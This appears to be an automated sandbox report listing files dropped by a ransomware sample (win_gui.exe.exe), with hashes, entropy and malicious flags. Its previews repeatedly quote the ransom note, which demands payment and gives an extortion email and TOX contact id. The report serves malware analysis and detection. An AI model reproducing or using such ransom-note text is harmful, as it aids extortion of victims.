                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1835616
                                Entropy (8bit):5.449303450297782
                                Encrypted:false
                                SSDEEP:24576:7mQ0JlVkITxwioiEDH3i+Hj1D+fnuEVW2UF8:7X0JliIDoxDXR4fnn7UF8
                                MD5:5F3DB0257DB5BEC996BE65DE136CE8D8
                                SHA1:86EC10C9C63A2D30E116F51213D723E2C270928D
                                SHA-256:290F22C4695AC005C1648B37C85C28CD058B54B0753F0518C7976BDA3147A147
                                SHA-512:31655D28217622FDB2D6ED4EF7AA25C1126437D9136500945EC41A6BFD351060169744F22F328A81387E4417C4149F23ABEB9CA1ECEE57D33F9A3FB501AD329D
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):33376
                                Entropy (8bit):7.993690549160133
                                Encrypted:true
                                SSDEEP:768:zx6DE4qiCbOX/a/JGXyz1uhCm4W/01XZ9yzoKYh/2xM0:N8ZnCiqJXc7n0Pyzo14xx
                                MD5:49B37FA72913A19605D45FACB470F8ED
                                SHA1:F34096EE71BD4D783834241D7F1187E9675471C6
                                SHA-256:9DEC9A84B64739BFC18091DA4263DACACF60079DEE309293BA81403D18341DE5
                                SHA-512:9980931FE564BAC39C0895CC65C508ECAF07F7519CEC4E324139EC93158BD3148E8A5183E3F4197614494A7EAF5E65CDBA461EC9E3ECDEFD50224595F1E2F7E0
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):524896
                                Entropy (8bit):6.861562429617699
                                Encrypted:false
                                SSDEEP:6144:OStIehZz64JFcG4Mql+jS/H68uQ9gVf4ibgBerd8GQZ2sBnIjmjnY4cG2:NhZz64ncICH68u4afPYXZvHjY1l
                                MD5:4F0E24439C8E262637F04B87E8A6C962
                                SHA1:81B655FD14F694781C0A162818C15DD78B1C759A
                                SHA-256:D5AB31FFFAA6B4BD77DD9E9A36E3A83DF00AFB96D4AB2601E5A373067880E987
                                SHA-512:993E268D54012636D645E4F85420F47CFA47A65F21EB80A77F98875F9EB715DE5BA0960736B01134AFE7C56CF8D7CD5EA903C74F1CBBC41E1202202BA251A489
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):262752
                                Entropy (8bit):7.999367826948063
                                Encrypted:true
                                SSDEEP:6144:IZNdZdJtxADrmXPRiyaKDUauCDHFP1sayRhS5yqYju0BBFJpA:IZNHj5aKDUaP/oRqSjuQJy
                                MD5:06FBA08C2F6B99E394642F91601CBEE1
                                SHA1:917625C2407D1AB7B470C7BB51748540848200A9
                                SHA-256:63BE3326743630A270D9FD9BB6B5D578779C3F925F5C6CF0448F454D8D569C14
                                SHA-512:947E1EA378BFE394890B08EAA726C7E1DD6EAD5BDF26500B62DBF2E46FCE27E784A81827928849EC3C202AC708A77E501E624B9031562DA0ED352E5FA7DCBBA7
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):33376
                                Entropy (8bit):7.993995561940174
                                Encrypted:true
                                SSDEEP:768:qi0vWkEyFJ6BDv7wopSdwx74vEea6axIrD39h0w:qi0vkyFoBDzwZK+E8sIvDN
                                MD5:A66B3A13DB79977E06C9001026083671
                                SHA1:F764E894545952264CE414223BA17C347936848C
                                SHA-256:1FAEEDCEAE89BB645AC9A51BE197710FCEC3F11430BB9566C06DB4B5C801D6BA
                                SHA-512:CC13546AEBF3A2A26A567FBA3B8A962A6CAD86758DB281AF4DDFE050E21197976F0889A1E7270848B4A8F97372931DF14D505CCBADABBC6D420F0AB0B20775CB
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):16992
                                Entropy (8bit):7.988851095684504
                                Encrypted:false
                                SSDEEP:384:4SHivq1dz0VLw1cRnhYd6hJHwt4g7rzpvLoOvSrD7X+VOa:dHinwG5hYd6hpqrzVgX7m
                                MD5:2A872608FA94BF72F34B17E728EF7D61
                                SHA1:3A966CC80CD5259D0323D01E05C619CA271840C0
                                SHA-256:CE85B3B45176D6D79EEB9A3CF429602939E0DE4800A68ED5E144F382C1CE30D6
                                SHA-512:10EEC56A69AAAC53CA3CCE6715432F676A99C4D6CF22C3213E47722F1955B1875EC2701BAA39B78340C3417BE92B305A0B61475C8049241F30AEB19A7064DDD6
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):104002
                                Entropy (8bit):7.9980319293466735
                                Encrypted:true
                                SSDEEP:3072:ohBmlGbGArp8BcJEWekizUZ5+bwwny3O4EJjV:ohBjKArCBcJEJkeUajnye4yV
                                MD5:B04EE71D5F6269D35BF1410D4B7D8651
                                SHA1:516836F2B9AE0D66B19885A004F4A730F3E90D27
                                SHA-256:6B03EBFEA22E71F1A38BFDA19780B45E9E90A84F410BB697A321666610E5B871
                                SHA-512:7597F94441DBB2A6C3D64C63C3D5009B3D41A5E96F2F154A0F94A2FBFB7A8A3518FA61BEFC0E9074264776747CD23A9BC95323371A0E314CA6210AF629A01CCA
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):239616
                                Entropy (8bit):7.9992979133215085
                                Encrypted:true
                                SSDEEP:3072:6uzCX8yp60RzK9l1WWBhahIHudxHlPtgzyraOO2G2BNmqG1UrqwGaUci3R+sjCys:7Mc0E9FiBX7JLLNPZK3/SpIZhAj
                                MD5:1B064D2CDBFC2822BFC1D33DE8D4E570
                                SHA1:331073493E3FF4F3F829EA1528158E25F9EF6D04
                                SHA-256:A59CA69D9029FE932411CA0ADEFBC05147A52A3F96E6516DB8AAEA909699D8DA
                                SHA-512:EF0B2895E60FE52B3DB32EFF0096F96C0EC90119AC181160F6557F0267D21688EC48AB5DE25B78BC874548D8CFA83E1297658A67847EB52CA9FCDCC7B15AC35D
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1810
                                Entropy (8bit):7.887694974950454
                                Encrypted:false
                                SSDEEP:48:b3HOZiNZOiKLPdixbh8Yhyd/WyYu+MAVMJg6TZ:TOUGrdixbh9ydevuAVOZ
                                MD5:C69165DA29323A5F78D1142A66BC2772
                                SHA1:D50D613330E1B96BD3EA24ADFCC3F222C25D8E9F
                                SHA-256:209F0761A443ED47BE665CEB9FF90FD155E9F3B3692C5AB2929C20906E46F6C7
                                SHA-512:EE07FE35D61EF4EEECDE16922CCAAB25D5F4359C447831F3296B025E0C91C1D823DE434DC29F0B5F89A890F890E09D7D1FCCC6DD107124F5A10A73DBEEA5E258
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):13693
                                Entropy (8bit):7.9877505603833185
                                Encrypted:false
                                SSDEEP:384:SercTtjIQcdsuMC6vXsxlKr1oTrvtw+VOc:zcBIfdsVCeXsxEgrVwY
                                MD5:F14CBEA46D6EE259A53CD01CD3594CF6
                                SHA1:DDA7F88631D014AAF056281B021FC5F581C21F69
                                SHA-256:FD34EADC55EE6BF17F643630EDDCD664DF6BB4976C10846B53CDD2FD0E51E4F7
                                SHA-512:9171955AF20678F411FA77E2693C0A6ED8989A39B9368BC7AFB6A6A55562951E716D2EEB95F5FB74BAE7B1601EFAD615BFA43EEC889331455F1D8952CB95CE07
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):234696
                                Entropy (8bit):7.999142776172254
                                Encrypted:true
                                SSDEEP:6144:3Au9tuRx/tsmgk2HUEpjUtwha5aJYYqEbCnnAa4eZK:p9twa3Na0a9rEFJ
                                MD5:3D54BAAFFE03A2520638138A31FD15D5
                                SHA1:7755AFD7534FCF3BB4D6E24FD3DD918EB74612FB
                                SHA-256:4D5C45754D2D4597224D4B9BE101FC79391613106B74573A51D1E9DFD413CB0D
                                SHA-512:4C5603D93FDF32F3CD67769E9BD7A131552E99078A9BB48FEFBE333BD1D70E8C3F22A4D1DC0EB827A1B261C85575038DC43B8F25C44D08356013B260B5E2FC0E
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):176840
                                Entropy (8bit):7.998808341285109
                                Encrypted:true
                                SSDEEP:3072:zvDTnF6mZ+UDhcs7V/8iuDGPHbfCp4y3NdupnCl9Zy7sVUw4dkf94Gld1b:jnF3Hcs7sDYHzCp4ud9MsVUwik3ld1b
                                MD5:E44D43CEB63E1F03FE7F18FBBDE1FDD2
                                SHA1:6921D4041F44C809055E4CCB8CC0C076DFEF0BDB
                                SHA-256:FA3549D98606DFB67A754CD01A1774CA440F3505FED75EB32EDA6DC7FA48402E
                                SHA-512:5A280050DAFF007AE7E97BB1D2A1AE055E7843E6679B8E20EDE926F28EF0ED99C5D03AC2365AA61CA6C075BECF8D56568036C3FD03464AA1251811B6D85EBCAB
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):196296
                                Entropy (8bit):7.999106659430505
                                Encrypted:true
                                SSDEEP:3072:NtVyf4xheJMsZ2XXuOJvpP3niB2yqCXSudih2yLD2GC4ARPPLr6FOCWElPq:NtIfM0usZSpvnW2yX7pyLiGC4W3H
                                MD5:734F3D3B91AE128D3AFCB81137439574
                                SHA1:BC80B7F1BA234A088ADACAD954A37BA3CE6FA116
                                SHA-256:AED4167B3B0E8FEDE552486F5B5F0E7453E602B652F5E24DF7408DA31BB7E8E5
                                SHA-512:F64DC6C6BFA9694EB42BEE6BB2F69B03C66CB1A10D5043A556AAE952C7D8E31146C3B2185552CA747583C36D3B751EDB1B843A078F6C641DAC84165846FCFAF3
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):812
                                Entropy (8bit):7.710767094402821
                                Encrypted:false
                                SSDEEP:24:0ZsfyGpZ5z/wpDyYPGTNj0hOHAVMJg6WXs93K4:Q+9pT/WyYu+MAVMJg6T5
                                MD5:37E6C43602D8760CFC977C202FE58AFE
                                SHA1:04A7F866ED4520399C10B47B4AD3D6A68EDB3FDE
                                SHA-256:0FD783BE16F4983A34B94D41EA81B28110555C9EF79426D63D4E35A7C8EA5724
                                SHA-512:1186C82F75E22D8628761055D67E6F00709CA28D36EBFFC6075E0386D3654F2A4CACD3AAA591C73CFB16898C2C5EE96F48341504EFE7567197B8DBA6C9709B26
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):7186249
                                Entropy (8bit):7.995708840734016
                                Encrypted:true
                                SSDEEP:196608:b8aNYqqNaXN0wMHZVCqo/ugQ9dz5COj1fNAgBMkKi:bJpqlzH3M/uNDz5bWgBAi
                                MD5:8EBCA2DF5CB8AFF13B44E6544BD795D0
                                SHA1:007278F60651216E5CD151D621F897A965199C2D
                                SHA-256:44BC34E80A6BD4EB53FB1BC86456096BCDE00D28E202A8DE27D877036409BBB0
                                SHA-512:4EA97C3C5DDAB1FA6CC2FA82090EB4C0B7E23ACA5E422FAB9AAB17936BB4FAC25D995241E9F5657A27E8B14EFEAEF9E4FD9AEC73C824695FC0D7C2DBCF365AF8
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):125112
                                Entropy (8bit):7.9985858202799855
                                Encrypted:true
                                SSDEEP:3072:JWPZVHAMB6KphLPMsyKbwlqLHfZS8eKvjmqEi5XvNnUy:0PZZA+jpV1bl/ZSxKvjmW5fNv
                                MD5:97DEEC4E633419F9D560AB655B76E0A1
                                SHA1:18B3F7535A49CE230E8A1F6AD301330249BDDFED
                                SHA-256:A59915E7A6C88250D8E991F2B48865F1677B8800CF3050A88C5880310267FBE4
                                SHA-512:5254096FF248ACE2C6CA9BA0A8901835CF3C8CEDDE250EB29E88077037EF5E761001D8BB3FF8E701AF79F3EA00D1A7C2CC8E47C99BAC4EB539057794F5AC2FFD
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1072312
                                Entropy (8bit):7.042915404968756
                                Encrypted:false
                                SSDEEP:24576:ZLsWUon6Rb6qu1PyC+NRLtpScpzbtT7pyOolKLLfHB5O2cxaNIdU:+on6AqSPyC+NltpScpzbtvpJoMXD7kaN
                                MD5:9A40E1B6F8BC2EF3DCDE954B92ECACFF
                                SHA1:9CFAEEFB9ED9D5720DA7B0B109D2C8F003087E5D
                                SHA-256:8747E687691FBD950D400B6659AA27B6D746F1A93DD22701895ED05975B102A1
                                SHA-512:809F6301E35C4646C07BCBD60E5C2DE91BC7346EA02B18A18827F3A140FCA67A31F83C2C61ED8FD005BC6ADA5F196CB7EFD6232866CCD4F2EE7E72601F54AAEE
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):200994
                                Entropy (8bit):7.9990215482457305
                                Encrypted:true
                                SSDEEP:6144:vKBCZ3b8J9LYK2hI4oKsqoNEivjx9OYq0kuGcn:vQCru9T2fsqkEiVsZHcn
                                MD5:2AD5DA53E4EC1CA88D321888E1C1DF26
                                SHA1:09C82F2431F6FBD58E0A57AB7BCE6FF23F0E6190
                                SHA-256:131F36DB31E41D4B6FF945E1E020A0A8A55CAC7A41B6A0DC4EB34F058C08BE7E
                                SHA-512:FCFEABB6A09364B0C734D147A65E638E303CAA440201E9FAA742EF5D6699CA0B2DA5CC959AF1644EF1F27C9FBE77EEBC2DFE4F580C4976FD9B0F08B9028C2329
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):34062
